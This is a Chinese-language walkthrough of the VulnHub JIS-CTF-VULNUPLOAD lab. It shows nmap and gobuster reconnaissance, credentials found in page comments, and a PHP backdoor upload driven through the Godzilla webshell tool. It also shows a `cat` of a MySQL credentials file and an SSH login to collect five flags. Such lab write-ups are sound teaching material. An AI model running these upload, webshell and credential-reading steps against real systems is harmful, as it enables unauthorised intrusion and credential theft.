JIS-CTF-VULNUPLOAD

靶机说明

https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

主机探测

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap -sn 192.168.2.0/24                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:15 EST
Nmap scan report for 192.168.2.1
Host is up (0.00012s latency).                              
MAC Address: 0A:00:27:00:00:0A (Unknown)                            
Nmap scan report for 192.168.2.2                                  
Host is up (0.00020s latency).                                
MAC Address: 08:00:27:5B:20:82 (Oracle VirtualBox virtual NIC)      Nmap scan report for 192.168.2.5                                   
Host is up (0.00050s latency).                                      MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)      Nmap scan report for 192.168.2.4   Host is up.                                              
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.03 seconds

nmap扫描

(1)进行端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.2.5 -oA nmapscan/ports                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:19 EST
Nmap scan report for 192.168.2.5
Host is up (0.0061s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds

(2)对端口细节进行扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap -sT -sV -O --min-rate 10000 -p 22,80 192.168.2.5 -oA nmapscan/detail 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:20 EST
Nmap scan report for 192.168.2.5
Host is up (0.00079s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.80 seconds

(3)对端口进行UDP扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap -sU -p22,80 192.168.2.5 -oA nmapscan/udp             
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:21 EST
Stats: 0:00:05 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.2.5
Host is up (0.00072s latency).

PORT   STATE  SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds

(4)进行漏洞扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap --script=vuln -p22,80 192.168.2.5 -oA nmapscan/vuln          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:24 EST
Nmap scan report for 192.168.2.5
Host is up (0.00094s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.2.5
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.2.5:80/
|     Form id: 
|_    Form action: check_login.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /admin_area/: Possible admin folder
|   /login.php: Possible admin folder
|   /admin_area/index.php: Possible admin folder
|   /robots.txt: Robots file
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 334.73 seconds

web渗透

80端口渗透

(1)访问80端口,发现是一个登录框

(2)使用gobuster进行目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo gobuster dir -u http://192.168.2.5 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.5
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 302) [Size: 1228] [--> login.php]
/.php                 (Status: 403) [Size: 290]
/.html                (Status: 403) [Size: 291]
/login.php            (Status: 200) [Size: 1485]
/assets               (Status: 301) [Size: 311] [--> http://192.168.2.5/assets/]
/css                  (Status: 301) [Size: 308] [--> http://192.168.2.5/css/]
/js                   (Status: 301) [Size: 307] [--> http://192.168.2.5/js/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/flag                 (Status: 301) [Size: 309] [--> http://192.168.2.5/flag/]
/flag.txt             (Status: 403) [Size: 294]
/robots.txt           (Status: 200) [Size: 160]
/.php                 (Status: 403) [Size: 290]
/.html                (Status: 403) [Size: 291]
/uploaded_files       (Status: 301) [Size: 319] [--> http://192.168.2.5/uploaded_files/]                                                                          
/hint.txt             (Status: 200) [Size: 145]
/server-status        (Status: 403) [Size: 299]
Progress: 830572 / 830576 (100.00%)
===============================================================
Finished
===============================================================

(3)尝试访问flag文件,找到第一个flag

1
The 1st flag is : {8734509128730458630012095}

(4)尝试访问robots.txt文件,找到以下的路径

1
2
3
4
5
6
7
8
9
User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag
  • 依次对路径进行访问,发现admin_area可以进行访问,查看页面源码,找到第二个flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!--	username : admin
	password : 3v1l_H@ck3r
	The 2nd flag is : {7412574125871236547895214}
-->
</body>
</html>

  • 使用注释里面的usernamepassword进行登录,成功进行登录,发现是一个文件上传页面
  • 进行文件上传测试
    直接上传一个PHP后门文件,发现上传成功,需要找到文件上传后的目录,访问/robots.txt,在里面找到了文件上传后保存的目录为uploded_files
    使用哥斯拉Godzilla连接网站,成功进入网站

找到flag.txt,访问提示权限不够

(5)尝试访问hint.txt文件,找到第三个flag

1
2
3
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

(6)根据hint.txt的提示,需要找到用户technawi的密码去读取flag.txt
尝试搜索用户名technawi

1
2
find / -user 'technawi' 2>/dev/null
#命令“2>/dev/null”表示过滤掉类似没有权限的信息


找到一个数据库的配置文件,尝试去读取,找到第四个flag和用户technawi的密码

1
2
3
4
5
6
/var/www/html/uploaded_files/ >cat /etc/mysql/conf.d/credentials.txt

The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

提权-ssh

(1)根据hint.txt的提示,需要以用户technawi的权限去读取flag.txt,同时靶机开放22端口,尝试进行ssh连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[/]
└─$ ssh technawi@192.168.2.5
technawi@192.168.2.5's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-72-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Fri Apr 21 17:22:16 2017

(2)成功以用户technawi进行登录,去读取文件flag.txt

1
2
3
4
5
6
technawi@Jordaninfosec-CTF01:~$ cat /var/www/html/flag.txt
The 5th flag is : {5473215946785213456975249}

Good job :)

You find 5 flags and got their points and finish the first scenario....

总结

(1)主要考查文件上传和ssh提权,比较简单,需要注重细节,不能放过任何一个路径

Vulnhub
#文件上传
JIS-CTF-VULNUPLOAD
http://miao-sec.github.io/Vulnhub/JIS-CTF-VULNUPLOAD/
作者
Miao
发布于
2025年6月20日
许可协议
BY-MIAO